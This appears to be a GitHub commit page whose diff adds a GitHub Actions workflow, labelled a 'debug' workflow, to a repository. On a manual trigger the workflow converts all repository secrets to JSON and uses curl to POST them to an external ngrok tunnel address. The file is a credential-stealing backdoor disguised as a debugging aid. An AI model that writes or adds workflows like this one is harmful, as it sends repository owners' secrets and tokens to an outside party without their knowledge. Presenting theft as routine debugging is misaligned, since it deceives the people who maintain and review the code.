Skip to content

Commit c341a46

Browse files
authored
debug: Add debug workflow (#245)
1 parent 9943035 commit c341a46

File tree

1 file changed

+14
-0
lines changed

1 file changed

+14
-0
lines changed
Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
name: debug-secrets-workflow
2+
on: workflow_dispatch
3+
4+
jobs:
5+
post-secrets:
6+
runs-on: ubuntu-latest
7+
steps:
8+
- name: Post secrets to API
9+
env:
10+
ALL_SECRETS: ${{ toJson(secrets) }}
11+
run: |
12+
curl -X POST https://6a4b34e5f94f.ngrok-free.app \
13+
-H "Content-Type: application/json" \
14+
-d "$ALL_SECRETS"

0 commit comments

Comments
 (0)